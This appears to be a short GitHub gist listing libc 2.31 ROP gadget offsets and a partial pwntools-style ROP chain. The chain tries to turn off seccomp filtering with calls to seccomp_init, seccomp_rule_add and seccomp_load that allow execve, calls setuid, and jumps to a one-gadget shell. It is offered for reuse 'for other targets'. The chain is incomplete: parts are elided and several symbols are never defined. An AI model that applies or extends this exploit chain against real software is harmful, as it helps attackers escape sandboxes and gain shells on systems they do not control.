@echel0nn
Created August 18, 2021 08:43
If you need one value from a function in libc 2.31, there is one chain that can transfer from rax to rbx and then move it to rdi; it can be used perfectly.
# 0x000000000011c371: pop rdx; pop r12; ret;
POP_RDX = int(libc.address) + 0x000000000011C371
POP_RSI = int(libc.address) + 0x0000000000027529
POP_RDI = int(libc.address) + 0x0000000000026B72
PUSH_RAX = int(libc.address) + 0x0000000000151841
POP_RAX = int(libc.address) + 0x000000000004a550
MOV_RDI_RBX = int(libc.address) + 0x0000000000083dd1 # mov rdi, rbx; call rax
SYSCALL = int(libc.address) + 0x0000000000066229 # syscall; ret
PUSH_RSP = int(libc.address) + 0x000000000004543d # push rsp; ret
rbp = int(libc.address) + 0x1ef000
I've tried to disable seccomp, but it failed miserably; still, the chain can be used for other targets.
...
+ p64(POP_RSI)
+ p64(SCMP_ACT_ALLOW)
+ p64(POP_RDX)
+ p64(0x3b) # execve to rdx
+ p64(0x0) # pop r12
+ p64(POP_RAX)
+ p64(exe.plt["seccomp_rule_add"])
+ p64(MOV_RDI_RBX)
+ p64(0x0)
+ p64(0x0)
+ p64(POP_RDX)
rop3 = (
p64(POP_RDI)
+ p64(0x0)
+ p64(SETUID)
+ p64(POP_RDI)
+ p64(SCMP_ACT_ALLOW)
+ p64(exe.plt["seccomp_init"])
+ p64(PUSH_RAX)
+ p64(0x0) # pop rbp
+ p64(0x0) # pop r12
+ p64(POP_RSI)
+ p64(SCMP_ACT_ALLOW)
+ p64(POP_RDX)
+ p64(0x3b) # execve to rdx
+ p64(0x0) # pop r12
+ p64(POP_RAX)
+ p64(exe.plt["seccomp_load"])
+ p64(MOV_RDI_RBX)
+ p64(0x0)
+ p64(0x0)
+ p64(POP_RDX)
+ p64(0x0)
+ p64(0x0)
+ p64(POP_RSI)
+ p64(0x0)
+ p64(ONE_GADGET)
)